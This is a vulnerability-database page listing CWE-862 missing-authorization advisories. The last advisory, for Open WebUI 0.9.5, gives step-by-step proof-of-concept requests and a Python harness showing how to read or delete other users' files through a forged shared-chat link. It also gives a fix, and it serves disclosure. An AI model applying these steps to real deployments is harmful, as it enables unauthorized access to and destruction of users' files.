CWE-862
Allowed-with-ReviewMissing Authorization
Abstraction: Class · Status: Incomplete
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
14602 vulnerabilities reference this CWE, most recent first.
GHSA-VR43-X7P6-79WP
Vulnerability from github – Published: 2025-07-07 21:31 – Updated: 2025-07-08 18:31Missing Authorization vulnerability in Wikimedia Foundation Mediawiki - AbuseFilter Extension allows Unauthorized Access.This issue affects Mediawiki - AbuseFilter Extension: from 1.39.X before 1.39.13, from 1.42.X before 1.42.7, from 1.43.X before 1.43.2.
{
"affected": [],
"aliases": [
"CVE-2025-53495"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-07T19:15:23Z",
"severity": "CRITICAL"
},
"details": "Missing Authorization vulnerability in Wikimedia Foundation Mediawiki - AbuseFilter Extension allows Unauthorized Access.This issue affects Mediawiki - AbuseFilter Extension: from 1.39.X before 1.39.13, from 1.42.X before 1.42.7, from 1.43.X before 1.43.2.",
"id": "GHSA-vr43-x7p6-79wp",
"modified": "2025-07-08T18:31:28Z",
"published": "2025-07-07T21:31:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53495"
},
{
"type": "WEB",
"url": "https://gerrit.wikimedia.org/r/c/mediawiki/extensions/AbuseFilter/+/1166040"
},
{
"type": "WEB",
"url": "https://phabricator.wikimedia.org/T396750"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VR5F-VJC4-R753
Vulnerability from github – Published: 2023-11-01 12:30 – Updated: 2023-11-08 21:30In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed
{
"affected": [],
"aliases": [
"CVE-2023-42632"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-01T10:15:09Z",
"severity": "MODERATE"
},
"details": "In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed",
"id": "GHSA-vr5f-vjc4-r753",
"modified": "2023-11-08T21:30:35Z",
"published": "2023-11-01T12:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42632"
},
{
"type": "WEB",
"url": "https://www.unisoc.com/en_us/secy/announcementDetail/https://www.unisoc.com/en_us/secy/announcementDetail/1719615756246777857"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VR5H-3WP5-6CWH
Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-04-23 18:32Missing Authorization vulnerability in WPFunnels Mail Mint mail-mint allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Mail Mint: from n/a through <= 1.19.4.
{
"affected": [],
"aliases": [
"CVE-2026-23541"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-19T09:16:11Z",
"severity": "HIGH"
},
"details": "Missing Authorization vulnerability in WPFunnels Mail Mint mail-mint allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Mail Mint: from n/a through \u003c= 1.19.4.",
"id": "GHSA-vr5h-3wp5-6cwh",
"modified": "2026-04-23T18:32:47Z",
"published": "2026-02-19T18:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23541"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/mail-mint/vulnerability/wordpress-mail-mint-plugin-1-19-4-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VR7X-83H2-6M7Q
Vulnerability from github – Published: 2025-04-08 09:31 – Updated: 2025-04-08 09:31A Missing Authorization Check vulnerability exists in the Virus Scanner Interface of SAP NetWeaver Application Server ABAP. Because of this, an attacker authenticated as a non-administrative user can initiate a transaction, allowing them to access but not modify non-sensitive data without further authorization and with no effect on availability.
{
"affected": [],
"aliases": [
"CVE-2025-27437"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-08T08:15:16Z",
"severity": "MODERATE"
},
"details": "A Missing Authorization Check vulnerability exists in the Virus Scanner Interface of SAP NetWeaver Application Server ABAP. Because of this, an attacker authenticated as a non-administrative user can initiate a transaction, allowing them to access but not modify non-sensitive data without further authorization and with no effect on availability.",
"id": "GHSA-vr7x-83h2-6m7q",
"modified": "2025-04-08T09:31:11Z",
"published": "2025-04-08T09:31:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27437"
},
{
"type": "WEB",
"url": "https://me.sap.com/notes/3568778"
},
{
"type": "WEB",
"url": "https://url.sap/sapsecuritypatchday"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VR93-PF7Q-JVM8
Vulnerability from github – Published: 2024-12-09 15:31 – Updated: 2026-04-23 15:33Missing Authorization vulnerability in Wpmet Metform Elementor Contact Form Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Metform Elementor Contact Form Builder: from n/a through 3.4.0.
{
"affected": [],
"aliases": [
"CVE-2023-50903"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-09T13:15:39Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in Wpmet Metform Elementor Contact Form Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Metform Elementor Contact Form Builder: from n/a through 3.4.0.",
"id": "GHSA-vr93-pf7q-jvm8",
"modified": "2026-04-23T15:33:39Z",
"published": "2024-12-09T15:31:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50903"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/metform/vulnerability/wordpress-metform-elementor-contact-form-builder-plugin-3-4-0-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VRCJ-8R35-5GQX
Vulnerability from github – Published: 2025-08-02 09:30 – Updated: 2025-08-02 09:30The WP CTA – Call To Action Plugin, Sticky CTA, Sticky Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_cta_status' and 'change_sticky_sidebar_name' functions in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to update the status of a sticky and update the name displayed in the back-end WP CTA Dashboard.
{
"affected": [],
"aliases": [
"CVE-2025-8152"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-02T08:15:26Z",
"severity": "MODERATE"
},
"details": "The WP CTA \u2013 Call To Action Plugin, Sticky CTA, Sticky Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \u0027update_cta_status\u0027 and \u0027change_sticky_sidebar_name\u0027 functions in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to update the status of a sticky and update the name displayed in the back-end WP CTA Dashboard.",
"id": "GHSA-vrcj-8r35-5gqx",
"modified": "2025-08-02T09:30:19Z",
"published": "2025-08-02T09:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8152"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/easy-sticky-sidebar/trunk/inc/ClassActions.php#L29"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/easy-sticky-sidebar/trunk/inc/ClassActions.php#L52"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=3336867%40easy-sticky-sidebar\u0026new=3336867%40easy-sticky-sidebar\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/981ed50b-8f03-4320-99f0-3f53f7b2fc44?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VRGQ-8X87-23C7
Vulnerability from github – Published: 2025-06-06 15:30 – Updated: 2026-04-01 18:35Missing Authorization vulnerability in ThemeHunk ThemeHunk allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ThemeHunk: from n/a through 1.1.1.
{
"affected": [],
"aliases": [
"CVE-2025-30990"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-06T13:15:38Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in ThemeHunk ThemeHunk allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ThemeHunk: from n/a through 1.1.1.",
"id": "GHSA-vrgq-8x87-23c7",
"modified": "2026-04-01T18:35:20Z",
"published": "2025-06-06T15:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30990"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/themehunk-megamenu-plus/vulnerability/wordpress-themehunk-1-1-1-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VRHC-3FR6-PC3C
Vulnerability from github – Published: 2026-06-17 14:12 – Updated: 2026-06-17 14:12Summary
Open WebUI v0.9.5 lets an authenticated user attach arbitrary file_id values to their own chat message without checking whether they own or can read those files. If the attacker then shares that chat and grants themselves read access, has_access_to_file() treats the victim file as accessible through the shared chat, and the file endpoints read or delete the victim file.
Impact
Security boundary crossed: file confidentiality and integrity.
An authenticated attacker who knows or obtains a victim file_id can make Open WebUI authorize, through an attacker-owned shared chat:
- reading the victim file via
GET /api/v1/files/{id}/content, and - deleting the victim file via
DELETE /api/v1/files/{id}.
Root Cause
Client-controlled message file IDs are persisted without file authorization checks:
# backend/open_webui/main.py
await Chats.insert_chat_files(
chat_id,
user_message.get('id'),
[
file_item.get('id')
for file_item in user_message_files
if file_item.get('type') == 'file'
],
user.id,
)
insert_chat_files() stores the provided IDs directly:
# backend/open_webui/models/chats.py
ChatFileModel(
user_id=user_id,
chat_id=chat_id,
message_id=message_id,
file_id=file_id,
)
Later, file authorization trusts shared-chat associations:
# backend/open_webui/utils/access_control/files.py
shared_chat_ids = await Chats.get_shared_chat_ids_by_file_id(file_id, db=db)
if shared_chat_ids:
accessible_ids = await AccessGrants.get_accessible_resource_ids(
user_id=user.id,
resource_type='shared_chat',
resource_ids=shared_chat_ids,
permission='read',
)
if accessible_ids:
return True
The download endpoint uses this helper:
# backend/open_webui/routers/files.py
if file.user_id == user.id or user.role == 'admin' or await has_access_to_file(id, 'read', user, db=db):
return FileResponse(file_path, ...)
On affected versions this shared-chat branch is not gated on access_type (the grant lookup hardcodes permission='read', but nothing checks that the request itself is a read). The same forged association therefore also satisfies the write check that DELETE /api/v1/files/{id} performs, so the attacker can delete the victim file, not only read it.
Because the shared-chat branch ignores access_type, the deletion does not require the forged association at all. A user granted only read access to a chat that the owner legitimately shared can delete the owner's own files attached to that chat via DELETE /api/v1/files/{id}, since the read grant satisfies the write check. The forged association (above) broadens this to any victim file_id; a legitimate read-only share reaches it without any forgery.
PoC
- Attacker creates or uses a chat they own.
- Attacker sends
POST /api/chat/completionsorPOST /api/v1/chat/completionswhere top-leveluser_message.filescontains:
[
{
"type": "file",
"id": "VICTIM_FILE_ID"
}
]
- Backend inserts a
chat_filerow linking the attacker chat toVICTIM_FILE_ID. - Attacker shares the chat and grants read access to themselves or public access.
- Attacker requests:
GET /api/v1/files/VICTIM_FILE_ID/content
Expected: 404/403 because the attacker does not own or otherwise have access to the victim file.
Actual: file authorization succeeds through the attacker-controlled shared-chat association.
Local Verification
I verified the bug locally with Open WebUI's real Chats.insert_chat_files() and real has_access_to_file() implementations. The harness uses fake DB adapters only to avoid this environment's async SQLite hang; the security-sensitive logic under test is the application code.
Result:
{
"before_chat_file_link_attacker_can_read": false,
"insert_sink": {
"db_commit_called": true,
"insert_returned_rows": true,
"stored_chat_ids": [
"attacker-chat"
],
"stored_file_ids": [
"victim-file"
],
"stored_user_ids": [
"attacker"
]
},
"after_attacker_shared_chat_links_victim_file_attacker_can_read": true,
"confirmed": true
}
PoC:
#!/usr/bin/env python3
"""
Verifier for chat-file link authorization bypass.
This intentionally avoids the app DB because the local Python 3.13 async SQLite
stack hangs in this checkout. It still executes Open WebUI's real
has_access_to_file() implementation, with fake model adapters standing in for
the DB tables.
"""
from __future__ import annotations
import asyncio
import json
import os
import sys
import types
from pathlib import Path
from types import SimpleNamespace
def prepare_imports() -> None:
repo_root = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(repo_root / "backend"))
os.environ["VECTOR_DB"] = "none"
class DummyTyper:
def command(self, *args, **kwargs):
return lambda fn: fn
sys.modules.setdefault(
"typer",
types.SimpleNamespace(
Typer=lambda *args, **kwargs: DummyTyper(),
Option=lambda *args, **kwargs: None,
echo=lambda *args, **kwargs: None,
Exit=Exception,
),
)
sys.modules.setdefault("uvicorn", types.SimpleNamespace(run=lambda *args, **kwargs: None))
class FakeFiles:
async def get_file_by_id(self, file_id, db=None):
if file_id == "victim-file":
return SimpleNamespace(
id="victim-file",
user_id="victim",
meta={},
)
return None
class FakeKnowledges:
async def get_knowledges_by_file_id(self, file_id, db=None):
return []
class FakeGroups:
async def get_groups_by_member_id(self, user_id, db=None):
return []
class FakeChannels:
async def get_channels_by_file_id_and_user_id(self, file_id, user_id, db=None):
return []
class FakeModels:
async def get_models_by_user_id(self, user_id, permission="read", db=None):
return []
class FakeChats:
def __init__(self, linked: bool):
self.linked = linked
async def get_shared_chat_ids_by_file_id(self, file_id, db=None):
if self.linked and file_id == "victim-file":
# This mirrors a chat_file row tying victim-file to the attacker's
# shared chat. The real insertion sink is Chats.insert_chat_files().
return ["attacker-chat"]
return []
class FakeAccessGrants:
def __init__(self, granted: bool):
self.granted = granted
async def has_access(self, *args, **kwargs):
return False
async def get_accessible_resource_ids(
self,
user_id,
resource_type,
resource_ids,
permission="read",
user_group_ids=None,
db=None,
):
if (
self.granted
and user_id == "attacker"
and resource_type == "shared_chat"
and "attacker-chat" in resource_ids
and permission == "read"
):
return {"attacker-chat"}
return set()
class FakeDb:
def __init__(self):
self.added = []
self.committed = False
def add_all(self, rows):
self.added.extend(rows)
async def commit(self):
self.committed = True
class FakeDbContext:
def __init__(self, db):
self.db = db
async def __aenter__(self):
return self.db
async def __aexit__(self, exc_type, exc, tb):
return False
async def verify_insert_sink_accepts_victim_file_id():
import open_webui.models.chats as chats_module
fake_db = FakeDb()
chats_table = chats_module.Chats
original_context = chats_module.get_async_db_context
original_existing = chats_table.get_chat_files_by_chat_id_and_message_id
async def fake_existing(self, chat_id, message_id, db=None):
return []
try:
chats_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)
chats_table.get_chat_files_by_chat_id_and_message_id = types.MethodType(fake_existing, chats_table)
inserted = await chats_table.insert_chat_files(
chat_id="attacker-chat",
message_id="attacker-message",
file_ids=["victim-file"],
user_id="attacker",
)
finally:
chats_module.get_async_db_context = original_context
chats_table.get_chat_files_by_chat_id_and_message_id = original_existing
return {
"insert_returned_rows": bool(inserted),
"db_commit_called": fake_db.committed,
"stored_file_ids": [getattr(row, "file_id", None) for row in fake_db.added],
"stored_chat_ids": [getattr(row, "chat_id", None) for row in fake_db.added],
"stored_user_ids": [getattr(row, "user_id", None) for row in fake_db.added],
}
async def main() -> None:
prepare_imports()
import open_webui.utils.access_control.files as file_acl
attacker = SimpleNamespace(id="attacker", role="user")
original = {
"Files": file_acl.Files,
"Knowledges": file_acl.Knowledges,
"Groups": file_acl.Groups,
"Channels": file_acl.Channels,
"Chats": file_acl.Chats,
"Models": file_acl.Models,
"AccessGrants": file_acl.AccessGrants,
}
try:
file_acl.Files = FakeFiles()
file_acl.Knowledges = FakeKnowledges()
file_acl.Groups = FakeGroups()
file_acl.Channels = FakeChannels()
file_acl.Models = FakeModels()
file_acl.Chats = FakeChats(linked=False)
file_acl.AccessGrants = FakeAccessGrants(granted=False)
before = await file_acl.has_access_to_file("victim-file", "read", attacker)
file_acl.Chats = FakeChats(linked=True)
file_acl.AccessGrants = FakeAccessGrants(granted=True)
after = await file_acl.has_access_to_file("victim-file", "read", attacker)
insert_sink = await verify_insert_sink_accepts_victim_file_id()
result = {
"victim_file_id": "victim-file",
"victim_file_owner": "victim",
"attacker_id": "attacker",
"attacker_owns_file": False,
"insert_sink": insert_sink,
"before_chat_file_link_attacker_can_read": before,
"after_attacker_shared_chat_links_victim_file_attacker_can_read": after,
"confirmed": (
before is False
and after is True
and insert_sink["insert_returned_rows"] is True
and insert_sink["stored_file_ids"] == ["victim-file"]
and insert_sink["stored_user_ids"] == ["attacker"]
),
"sink": "Chats.insert_chat_files() accepts caller-supplied file_ids without checking file ownership/read access",
}
print(json.dumps(result, indent=2, sort_keys=True))
finally:
for name, value in original.items():
setattr(file_acl, name, value)
if __name__ == "__main__":
asyncio.run(main())
Recommended Fix
Before calling Chats.insert_chat_files(), filter user_message.files to files the caller owns or can read:
allowed_file_ids = []
for file_id in requested_file_ids:
file = await Files.get_file_by_id(file_id)
if file and (file.user_id == user.id or user.role == 'admin' or await has_access_to_file(file_id, 'read', user)):
allowed_file_ids.append(file_id)
Also consider enforcing this inside Chats.insert_chat_files() so future call sites cannot create unauthorized chat_file associations.
Additionally, the shared-chat branch of has_access_to_file() should honour access_type, so a read grant cannot satisfy the write check used by file deletion.
Consolidation
Per Open WebUI's Report Handling policy this consolidates independent reports of the same chat-file authorization flaws into one advisory and CVE:
- Cross-user file READ via a forged
chat_fileassociation (GET /api/v1/files/{id}/content): @0xEr3n. Fixed by #25054, which gatesChats.insert_chat_files()so a caller can only link files they own or can read. - Cross-user file DELETION via the shared-chat branch ignoring
access_type(DELETE /api/v1/files/{id}): reported independently by @oxsignal (earliest filing; reached via a legitimately read-only-shared chat, no forged association needed), by @0xEr3n (via the forged association), and by @5yu4n. Fixed by #24755, which makes the shared-chat branch honouraccess_type.
Affected: <= 0.9.5. Patched: >= 0.9.6. One CVE for the consolidated advisory.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.5"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54010"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-639",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-17T14:12:20Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nOpen WebUI `v0.9.5` lets an authenticated user attach arbitrary `file_id` values to their own chat message without checking whether they own or can read those files. If the attacker then shares that chat and grants themselves read access, `has_access_to_file()` treats the victim file as accessible through the shared chat, and the file endpoints read or delete the victim file.\n\n## Impact\n\nSecurity boundary crossed: file confidentiality and integrity.\n\nAn authenticated attacker who knows or obtains a victim `file_id` can make Open WebUI authorize, through an attacker-owned shared chat:\n\n- reading the victim file via `GET /api/v1/files/{id}/content`, and\n- deleting the victim file via `DELETE /api/v1/files/{id}`.\n\n## Root Cause\n\nClient-controlled message file IDs are persisted without file authorization checks:\n\n```python\n# backend/open_webui/main.py\nawait Chats.insert_chat_files(\n chat_id,\n user_message.get(\u0027id\u0027),\n [\n file_item.get(\u0027id\u0027)\n for file_item in user_message_files\n if file_item.get(\u0027type\u0027) == \u0027file\u0027\n ],\n user.id,\n)\n```\n\n`insert_chat_files()` stores the provided IDs directly:\n\n```python\n# backend/open_webui/models/chats.py\nChatFileModel(\n user_id=user_id,\n chat_id=chat_id,\n message_id=message_id,\n file_id=file_id,\n)\n```\n\nLater, file authorization trusts shared-chat associations:\n\n```python\n# backend/open_webui/utils/access_control/files.py\nshared_chat_ids = await Chats.get_shared_chat_ids_by_file_id(file_id, db=db)\nif shared_chat_ids:\n accessible_ids = await AccessGrants.get_accessible_resource_ids(\n user_id=user.id,\n resource_type=\u0027shared_chat\u0027,\n resource_ids=shared_chat_ids,\n permission=\u0027read\u0027,\n )\n if accessible_ids:\n return True\n```\n\nThe download endpoint uses this helper:\n\n```python\n# backend/open_webui/routers/files.py\nif file.user_id == user.id or user.role == \u0027admin\u0027 or await has_access_to_file(id, \u0027read\u0027, user, db=db):\n return FileResponse(file_path, ...)\n```\n\nOn affected versions this shared-chat branch is not gated on `access_type` (the grant lookup hardcodes `permission=\u0027read\u0027`, but nothing checks that the request itself is a read). The same forged association therefore also satisfies the `write` check that `DELETE /api/v1/files/{id}` performs, so the attacker can delete the victim file, not only read it.\n\nBecause the shared-chat branch ignores `access_type`, the deletion does not require the forged association at all. A user granted only **read** access to a chat that the owner legitimately shared can delete the owner\u0027s own files attached to that chat via `DELETE /api/v1/files/{id}`, since the read grant satisfies the `write` check. The forged association (above) broadens this to any victim `file_id`; a legitimate read-only share reaches it without any forgery.\n\n## PoC\n\n1. Attacker creates or uses a chat they own.\n2. Attacker sends `POST /api/chat/completions` or `POST /api/v1/chat/completions` where top-level `user_message.files` contains:\n\n```json\n[\n {\n \"type\": \"file\",\n \"id\": \"VICTIM_FILE_ID\"\n }\n]\n```\n\n3. Backend inserts a `chat_file` row linking the attacker chat to `VICTIM_FILE_ID`.\n4. Attacker shares the chat and grants read access to themselves or public access.\n5. Attacker requests:\n\n```text\nGET /api/v1/files/VICTIM_FILE_ID/content\n```\n\nExpected: 404/403 because the attacker does not own or otherwise have access to the victim file.\n\nActual: file authorization succeeds through the attacker-controlled shared-chat association.\n\n## Local Verification\n\nI verified the bug locally with Open WebUI\u0027s real `Chats.insert_chat_files()` and real `has_access_to_file()` implementations. The harness uses fake DB adapters only to avoid this environment\u0027s async SQLite hang; the security-sensitive logic under test is the application code.\n\nResult:\n\n```json\n{\n \"before_chat_file_link_attacker_can_read\": false,\n \"insert_sink\": {\n \"db_commit_called\": true,\n \"insert_returned_rows\": true,\n \"stored_chat_ids\": [\n \"attacker-chat\"\n ],\n \"stored_file_ids\": [\n \"victim-file\"\n ],\n \"stored_user_ids\": [\n \"attacker\"\n ]\n },\n \"after_attacker_shared_chat_links_victim_file_attacker_can_read\": true,\n \"confirmed\": true\n}\n```\n\nPoC:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nVerifier for chat-file link authorization bypass.\n\nThis intentionally avoids the app DB because the local Python 3.13 async SQLite\nstack hangs in this checkout. It still executes Open WebUI\u0027s real\nhas_access_to_file() implementation, with fake model adapters standing in for\nthe DB tables.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport json\nimport os\nimport sys\nimport types\nfrom pathlib import Path\nfrom types import SimpleNamespace\n\n\ndef prepare_imports() -\u003e None:\n repo_root = Path(__file__).resolve().parents[1]\n sys.path.insert(0, str(repo_root / \"backend\"))\n os.environ[\"VECTOR_DB\"] = \"none\"\n\n class DummyTyper:\n def command(self, *args, **kwargs):\n return lambda fn: fn\n\n sys.modules.setdefault(\n \"typer\",\n types.SimpleNamespace(\n Typer=lambda *args, **kwargs: DummyTyper(),\n Option=lambda *args, **kwargs: None,\n echo=lambda *args, **kwargs: None,\n Exit=Exception,\n ),\n )\n sys.modules.setdefault(\"uvicorn\", types.SimpleNamespace(run=lambda *args, **kwargs: None))\n\n\nclass FakeFiles:\n async def get_file_by_id(self, file_id, db=None):\n if file_id == \"victim-file\":\n return SimpleNamespace(\n id=\"victim-file\",\n user_id=\"victim\",\n meta={},\n )\n return None\n\n\nclass FakeKnowledges:\n async def get_knowledges_by_file_id(self, file_id, db=None):\n return []\n\n\nclass FakeGroups:\n async def get_groups_by_member_id(self, user_id, db=None):\n return []\n\n\nclass FakeChannels:\n async def get_channels_by_file_id_and_user_id(self, file_id, user_id, db=None):\n return []\n\n\nclass FakeModels:\n async def get_models_by_user_id(self, user_id, permission=\"read\", db=None):\n return []\n\n\nclass FakeChats:\n def __init__(self, linked: bool):\n self.linked = linked\n\n async def get_shared_chat_ids_by_file_id(self, file_id, db=None):\n if self.linked and file_id == \"victim-file\":\n # This mirrors a chat_file row tying victim-file to the attacker\u0027s\n # shared chat. The real insertion sink is Chats.insert_chat_files().\n return [\"attacker-chat\"]\n return []\n\n\nclass FakeAccessGrants:\n def __init__(self, granted: bool):\n self.granted = granted\n\n async def has_access(self, *args, **kwargs):\n return False\n\n async def get_accessible_resource_ids(\n self,\n user_id,\n resource_type,\n resource_ids,\n permission=\"read\",\n user_group_ids=None,\n db=None,\n ):\n if (\n self.granted\n and user_id == \"attacker\"\n and resource_type == \"shared_chat\"\n and \"attacker-chat\" in resource_ids\n and permission == \"read\"\n ):\n return {\"attacker-chat\"}\n return set()\n\n\nclass FakeDb:\n def __init__(self):\n self.added = []\n self.committed = False\n\n def add_all(self, rows):\n self.added.extend(rows)\n\n async def commit(self):\n self.committed = True\n\n\nclass FakeDbContext:\n def __init__(self, db):\n self.db = db\n\n async def __aenter__(self):\n return self.db\n\n async def __aexit__(self, exc_type, exc, tb):\n return False\n\n\nasync def verify_insert_sink_accepts_victim_file_id():\n import open_webui.models.chats as chats_module\n\n fake_db = FakeDb()\n chats_table = chats_module.Chats\n\n original_context = chats_module.get_async_db_context\n original_existing = chats_table.get_chat_files_by_chat_id_and_message_id\n\n async def fake_existing(self, chat_id, message_id, db=None):\n return []\n\n try:\n chats_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)\n chats_table.get_chat_files_by_chat_id_and_message_id = types.MethodType(fake_existing, chats_table)\n\n inserted = await chats_table.insert_chat_files(\n chat_id=\"attacker-chat\",\n message_id=\"attacker-message\",\n file_ids=[\"victim-file\"],\n user_id=\"attacker\",\n )\n finally:\n chats_module.get_async_db_context = original_context\n chats_table.get_chat_files_by_chat_id_and_message_id = original_existing\n\n return {\n \"insert_returned_rows\": bool(inserted),\n \"db_commit_called\": fake_db.committed,\n \"stored_file_ids\": [getattr(row, \"file_id\", None) for row in fake_db.added],\n \"stored_chat_ids\": [getattr(row, \"chat_id\", None) for row in fake_db.added],\n \"stored_user_ids\": [getattr(row, \"user_id\", None) for row in fake_db.added],\n }\n\n\nasync def main() -\u003e None:\n prepare_imports()\n\n import open_webui.utils.access_control.files as file_acl\n\n attacker = SimpleNamespace(id=\"attacker\", role=\"user\")\n\n original = {\n \"Files\": file_acl.Files,\n \"Knowledges\": file_acl.Knowledges,\n \"Groups\": file_acl.Groups,\n \"Channels\": file_acl.Channels,\n \"Chats\": file_acl.Chats,\n \"Models\": file_acl.Models,\n \"AccessGrants\": file_acl.AccessGrants,\n }\n\n try:\n file_acl.Files = FakeFiles()\n file_acl.Knowledges = FakeKnowledges()\n file_acl.Groups = FakeGroups()\n file_acl.Channels = FakeChannels()\n file_acl.Models = FakeModels()\n\n file_acl.Chats = FakeChats(linked=False)\n file_acl.AccessGrants = FakeAccessGrants(granted=False)\n before = await file_acl.has_access_to_file(\"victim-file\", \"read\", attacker)\n\n file_acl.Chats = FakeChats(linked=True)\n file_acl.AccessGrants = FakeAccessGrants(granted=True)\n after = await file_acl.has_access_to_file(\"victim-file\", \"read\", attacker)\n\n insert_sink = await verify_insert_sink_accepts_victim_file_id()\n\n result = {\n \"victim_file_id\": \"victim-file\",\n \"victim_file_owner\": \"victim\",\n \"attacker_id\": \"attacker\",\n \"attacker_owns_file\": False,\n \"insert_sink\": insert_sink,\n \"before_chat_file_link_attacker_can_read\": before,\n \"after_attacker_shared_chat_links_victim_file_attacker_can_read\": after,\n \"confirmed\": (\n before is False\n and after is True\n and insert_sink[\"insert_returned_rows\"] is True\n and insert_sink[\"stored_file_ids\"] == [\"victim-file\"]\n and insert_sink[\"stored_user_ids\"] == [\"attacker\"]\n ),\n \"sink\": \"Chats.insert_chat_files() accepts caller-supplied file_ids without checking file ownership/read access\",\n }\n print(json.dumps(result, indent=2, sort_keys=True))\n finally:\n for name, value in original.items():\n setattr(file_acl, name, value)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n```\n\n## Recommended Fix\n\nBefore calling `Chats.insert_chat_files()`, filter `user_message.files` to files the caller owns or can read:\n\n```python\nallowed_file_ids = []\nfor file_id in requested_file_ids:\n file = await Files.get_file_by_id(file_id)\n if file and (file.user_id == user.id or user.role == \u0027admin\u0027 or await has_access_to_file(file_id, \u0027read\u0027, user)):\n allowed_file_ids.append(file_id)\n```\n\nAlso consider enforcing this inside `Chats.insert_chat_files()` so future call sites cannot create unauthorized `chat_file` associations.\n\nAdditionally, the shared-chat branch of `has_access_to_file()` should honour `access_type`, so a read grant cannot satisfy the write check used by file deletion.\n\n## Consolidation\n\nPer Open WebUI\u0027s Report Handling policy this consolidates independent reports of the same chat-file authorization flaws into one 